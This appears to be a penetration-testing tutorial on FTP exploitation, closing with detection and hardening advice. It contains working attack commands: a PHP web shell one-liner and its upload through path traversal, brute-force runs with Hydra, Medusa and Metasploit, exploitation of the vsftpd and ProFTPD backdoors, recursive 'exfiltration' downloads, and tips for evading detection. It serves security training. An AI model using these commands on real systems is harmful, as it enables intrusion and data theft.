FTP Service Attacks and Exploitation
Complete guide to FTP service exploitation including anonymous authentication, brute-force attacks, FTP bounce attacks, and modern FTP vulnerabilities.
Introduction
The File Transfer Protocol (FTP) is a standard network protocol used for transferring files between a client and server over a TCP-based network. Despite being one of the oldest application-layer protocols (originally specified in 1971), FTP remains widely deployed in corporate environments, web hosting platforms, and embedded systems.
FTP's inherent security weaknesses make it an attractive target for penetration testers and attackers:
- Plain-text authentication: Credentials transmitted without encryption
- Clear-text data transfer: File contents visible to network sniffers
- Anonymous access: Frequently misconfigured to allow unauthenticated access
- Weak access controls: Directory permissions often improperly configured
- Protocol design flaws: FTP bounce attacks and command injection vectors
Why FTP Remains Relevant in Security Assessments
Despite widespread availability of secure alternatives (SFTP, FTPS, SCP), FTP persists due to:
- Legacy system requirements: Older applications and devices require FTP
- Ease of deployment: Simple setup without certificate management
- Embedded device defaults: IoT and network equipment ship with FTP enabled
- Anonymous file sharing: Organizations use FTP for public file distribution
- Integration dependencies: Custom applications built around FTP APIs
FTP vulnerabilities frequently appear in penetration testing engagements, with anonymous access and weak credentials being common findings.
Technical Background
FTP Protocol Overview
FTP operates on a client-server model using two separate connections:
Control Connection (Command Channel):
- Port: TCP/21 (default)
- Purpose: Authentication, commands, responses
- Protocol: ASCII text-based
- Lifetime: Persistent throughout session
Data Connection (Data Channel):
- Ports: TCP/20 (active mode) or ephemeral high ports (passive mode)
- Purpose: File transfers, directory listings
- Lifetime: Established per-operation, then closed
FTP Modes
Active Mode (PORT):
- Client opens random high port and sends PORT command with IP:Port
- Server initiates data connection from port 20 to client's specified port
- Problem: Blocked by client-side firewalls (inbound connection)
Passive Mode (PASV):
- Client sends PASV command
- Server opens random high port and returns IP:Port
- Client initiates data connection to server's specified port
- Advantage: Works through client-side firewalls
FTP Commands
Common FTP commands relevant to security testing:
| Command | Purpose | Security Implications |
|---|---|---|
USER | Username authentication | Transmitted in clear text |
PASS | Password authentication | Transmitted in clear text |
LIST | Directory listing | Reveals file structure |
RETR | Download file | Exfiltration vector |
STOR | Upload file | Web shell upload potential |
DELE | Delete file | Denial of service / cleanup |
MKD | Create directory | May bypass restrictions |
RMD | Remove directory | Destructive capability |
PORT | Active mode data connection | FTP bounce attack vector |
PASV | Passive mode data connection | Firewall evasion |
SYST | System information | Version disclosure |
STAT | Server status | Information disclosure |
HELP | Available commands | Feature enumeration |
Enumeration
Nmap Service Detection
Use Nmap to identify FTP services and check for anonymous access:
# Basic FTP detection
nmap -p 21 -sV -sC 10.10.11.45
# Comprehensive FTP script scan
nmap -p 21 -sV --script=ftp-* 10.10.11.45
# Target multiple FTP ports
nmap -p 21,2121,990,8021 -sV -sC 10.10.11.0/24Useful Nmap NSE Scripts:
ftp-anon: Checks for anonymous FTP loginftp-bounce: Tests for FTP bounce vulnerabilityftp-libopie: Checks for libopie buffer overflowftp-proftpd-backdoor: Detects ProFTPD 1.3.3c backdoorftp-vsftpd-backdoor: Detects vsftpd 2.3.4 backdoorftp-vuln-cve2010-4221: Tests for ProFTPD SQL injection
Example Output
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 1170 924 31 Mar 28 2001 .banner
| d--x--x--x 2 root root 1024 Jan 14 2002 bin
| d--x--x--x 2 root root 1024 Aug 10 1999 etc
| drwxr-srwt 2 1170 924 2048 Jul 19 18:48 incoming [NSE: writeable]
|_Only 5 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
Service Info: OS: UnixManual Enumeration
Connect directly to enumerate service information:
# Using FTP client
ftp 10.10.11.45
# Using Netcat (raw commands)
nc 10.10.11.45 21
# Using Telnet
telnet 10.10.11.45 21Banner Grabbing:
# Extract version information
echo "QUIT" | nc 10.10.11.45 21
# Example banner
220 (vsFTPd 3.0.3)
220 ProFTPD 1.3.5 Server
220 Microsoft FTP ServiceExploitation Techniques
Anonymous Authentication
Anonymous FTP access is a common misconfiguration that allows unauthenticated users to browse and potentially upload files.
Test Anonymous Login
Attempt authentication with common anonymous credentials:
# Using FTP client
ftp 10.10.11.45
# Username: anonymous
# Password: anonymous (or blank)
# Automated connection
ftp -A 10.10.11.45
# Using wget for recursive download
wget -r ftp://anonymous:[email protected]/
# Using curl
curl -u anonymous:anonymous ftp://10.10.11.45/ --list-onlyCommon Anonymous Credentials:
- Username:
anonymous, Password:anonymous - Username:
anonymous, Password:guest - Username:
anonymous, Password: (blank) - Username:
ftp, Password:ftp
Enumerate Accessible Directories
Once connected, explore the file system:
ftp> ls -la
ftp> cd pub
ftp> pwd
ftp> dir -R
# Check for writable directories
ftp> cd incoming
ftp> mkdir test
ftp> rmdir testHigh-Value Target Directories:
/home/- User home directories/var/www/- Web server document root/backup/- Database and configuration backups/config/- Application configurations/incoming/- Often world-writable/pub/- Public file sharing
Download Sensitive Files
Retrieve potentially sensitive information:
# Single file download
ftp> get passwords.txt
ftp> get backup.zip
ftp> get id_rsa
# Binary mode for non-text files
ftp> binary
ftp> get database_backup.sql.gz
# ASCII mode for text files
ftp> ascii
ftp> get .bash_history
# Multiple file download
ftp> mget *.txt
ftp> mget *.confRecursive Download with wget:
wget -r --no-passive ftp://anonymous:[email protected]/Test Upload Capability
If write access exists, test file upload:
# Create test file
echo "<?php system(\$_GET['cmd']); ?>" > shell.php
# Upload to FTP
ftp> put shell.php
ftp> put backdoor.aspx
ftp> put test.html
# Verify upload
ftp> ls -la
# Multiple file upload
ftp> mput *.phpWeb Shell Upload Scenario:
- Identify web-accessible FTP directory
- Upload web shell (PHP, ASP, ASPX, JSP)
- Access via HTTP:
http://10.10.11.45/shell.php?cmd=whoami
Brute Force Attacks
When anonymous access is disabled, credential brute-forcing may be necessary.
Using Hydra
# Single username attack
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.11.45
# User list and password list
hydra -L users.txt -P passwords.txt ftp://10.10.11.45
# With specific port
hydra -l fiona -P /usr/share/wordlists/rockyou.txt ftp://10.10.11.45:2121
# Verbose output
hydra -l admin -P passwords.txt -V ftp://10.10.11.45
# Faster threads (be careful - may trigger IDS)
hydra -l admin -P passwords.txt -t 16 ftp://10.10.11.45Using Medusa
# Basic brute force
medusa -u admin -P /usr/share/wordlists/rockyou.txt -h 10.10.11.45 -M ftp
# Multiple users
medusa -U users.txt -P passwords.txt -h 10.10.11.45 -M ftp
# Stop after first valid credentials
medusa -u admin -P passwords.txt -h 10.10.11.45 -M ftp -f
# Verbose mode
medusa -u admin -P passwords.txt -h 10.10.11.45 -M ftp -v 6Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/ftp/ftp_login) > set USER_FILE users.txt
msf6 auxiliary(scanner/ftp/ftp_login) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/ftp/ftp_login) > runPassword Spraying vs Brute Force
Modern FTP servers often implement account lockout policies. Password spraying (testing one password across many accounts) is more effective and stealthy than brute-forcing (testing many passwords against one account).
Recommended Approach:
- Enumerate valid usernames first
- Test a small list of common passwords
- Wait between attempts to avoid detection
- Use VPN/proxy rotation for distributed attacks
FTP Bounce Attack
The FTP bounce attack exploits the PORT command to abuse an FTP server as a proxy for port scanning or attacking internal systems.
Attack Concept
- Attacker connects to vulnerable FTP server (FTP_DMZ)
- Attacker sends
PORTcommand specifying internal target IP and port - FTP server initiates connection to internal target
- Attacker observes connection success/failure for port scanning
Using Nmap
# Basic FTP bounce scan
nmap -Pn -v -n -p 80,443,445,3389 -b anonymous:[email protected] 172.17.0.2
# Scan entire subnet through FTP
nmap -Pn -p 22,80,443 -b ftp:[email protected] 192.168.1.0/24
# Comprehensive port scan
nmap -Pn -sV -p- -b anonymous:@10.10.11.45 10.10.10.5Limitations:
- Modern FTP servers block by default
- Requires anonymous or compromised FTP credentials
- Slow compared to direct scanning
- Easily logged and detected
Manual FTP Bounce
ftp 10.10.11.45
ftp> PORT 172,17,0,2,0,80
200 PORT command successful
ftp> LISTIf connection succeeds: Port is open on target If connection fails: Port is closed or filtered
Common FTP Vulnerabilities
vsftpd 2.3.4 Backdoor (CVE-2011-2523)
# Using Metasploit
msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.11.45
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
# Manual exploitation
nc 10.10.11.45 21
USER backdoored:)
PASS anything
# Backdoor shell opens on port 6200
nc 10.10.11.45 6200ProFTPD 1.3.3c Backdoor (CVE-2010-4221)
msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 10.10.11.45
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploitCoreFTP Path Traversal (CVE-2022-22836)
Allows authenticated users to write files outside restricted directories.
# Create malicious payload
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Exploit path traversal
curl -k -X PUT -H "Host: 10.10.11.45" \
--basic -u admin:password123 \
--data-binary @shell.php \
--path-as-is \
https://10.10.11.45/../../../../../../inetpub/wwwroot/shell.php
# Verify upload
curl http://10.10.11.45/shell.php?cmd=whoamiPost-Exploitation
File Transfer Modes
Understanding FTP transfer modes is critical for successful exploitation:
Binary Mode
Use for:
- Executables (.exe, .dll, .so)
- Compressed files (.zip, .gz, .tar)
- Images (.jpg, .png, .gif)
- Database files
ftp> binary
200 Switching to Binary mode.
ftp> put payload.exe
ftp> get backup.tar.gzASCII Mode
Use for:
- Text files (.txt, .log, .conf)
- Scripts (.sh, .ps1, .py)
- Source code (.c, .php, .asp)
- Configuration files
ftp> ascii
200 Switching to ASCII mode.
ftp> put shell.php
ftp> get passwords.txtFile Corruption Warning
Uploading binary files in ASCII mode corrupts them due to line-ending conversions. Always verify transfer mode before uploading executables or payloads.
Privilege Escalation via FTP
If FTP runs with elevated privileges, file upload can lead to privilege escalation:
Scenario 1: Web Shell Upload
- Anonymous FTP allows upload to web directory
- Upload PHP/ASP web shell
- Execute via HTTP to gain RCE
Scenario 2: Cron Job Manipulation
- FTP allows access to
/etc/cron.d/or/var/spool/cron/ - Upload malicious cron job
- Wait for scheduled execution as root
Scenario 3: SSH Key Injection
- FTP allows write to
/home/user/.ssh/ - Upload attacker's public key to
authorized_keys - SSH as user with key-based authentication
Data Exfiltration
# Download entire directory structure
wget -r --no-passive ftp://admin:[email protected]/
# Mirror FTP server
lftp -e "mirror ; quit" ftp://admin:[email protected]/
# Selective download
lftp -c "open ftp://admin:[email protected]; mget *.sql; quit"Detection and Defense
Monitoring for FTP Attacks
Event Indicators:
- Multiple failed login attempts (brute-force)
- Anonymous login followed by file uploads
PORTcommands with internal IP addresses (bounce attacks)- File downloads of sensitive data
- Unusual connection times or source IPs
Log Analysis:
# vsftpd logs
tail -f /var/log/vsftpd.log
# ProFTPD logs
tail -f /var/log/proftpd/proftpd.log
# Check for failed logins
grep "FAIL LOGIN" /var/log/vsftpd.log
# Detect brute force
grep "authentication failed" /var/log/proftpd/proftpd.log | cut -d' ' -f8 | sort | uniq -c | sort -nHardening FTP Services
Disable Anonymous Access
# vsftpd configuration (/etc/vsftpd.conf)
anonymous_enable=NO
# ProFTPD configuration (/etc/proftpd/proftpd.conf)
<Anonymous ~ftp>
User ftp
Group ftp
UserAlias anonymous ftp
# Comment out entire block or disable
</Anonymous>Implement Strong Authentication
- Enforce strong password policies (15+ characters, complexity)
- Use public key authentication where supported
- Implement two-factor authentication (e.g., Google Authenticator)
- Regularly audit and disable inactive accounts
Restrict Network Access
# iptables firewall rules
iptables -A INPUT -p tcp --dport 21 -s 10.10.10.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 21 -j DROP
# vsftpd TCP wrappers
# /etc/hosts.allow
vsftpd: 10.10.10.0/24
# /etc/hosts.deny
vsftpd: ALLConfigure Chroot Jails
Prevent directory traversal by jailing users:
# vsftpd
chroot_local_user=YES
chroot_list_enable=NO
# ProFTPD
DefaultRoot ~Enable Logging and Monitoring
# vsftpd extensive logging
log_ftp_protocol=YES
xferlog_enable=YES
xferlog_file=/var/log/vsftpd.log
# ProFTPD detailed logging
SystemLog /var/log/proftpd/proftpd.log
TransferLog /var/log/proftpd/xferlogDisable Dangerous Commands
# vsftpd - disable ABOR, DELE, RNFR, RNTO, STOR, STOU
cmds_allowed=FEAT,REST,CWD,LIST,MDTM,MKD,NLST,PASS,PASV,PORT,PWD,QUIT,RETR,SIZE,TYPE,USER
# ProFTPD
<Limit SITE_CHMOD>
DenyAll
</Limit>
<Limit DELE RMD>
DenyAll
</Limit>Migrate to Secure Alternatives
SFTP (SSH File Transfer Protocol):
- Encrypted authentication and data transfer
- Piggybacks on SSH (port 22)
- Strong cryptographic protection
FTPS (FTP Secure):
- FTP with TLS/SSL encryption
- Explicit (FTPES) or Implicit (FTPS) modes
- Certificate-based authentication available
SCP (Secure Copy Protocol):
- SSH-based file transfer
- Simple, secure, encrypted
- No interactive session required
References
Last updated on
DNS Attacks: Comprehensive Guide to DNS Exploitation and Security
Complete DNS attack guide covering zone transfers, cache poisoning, subdomain takeovers, tunneling, and amplification with detection strategies.
RDP Service Attacks and Exploitation
RDP attack and exploitation techniques including password attacks, session hijacking, pass-the-hash, BlueKeep vulnerability, and RDPGateway exploitation.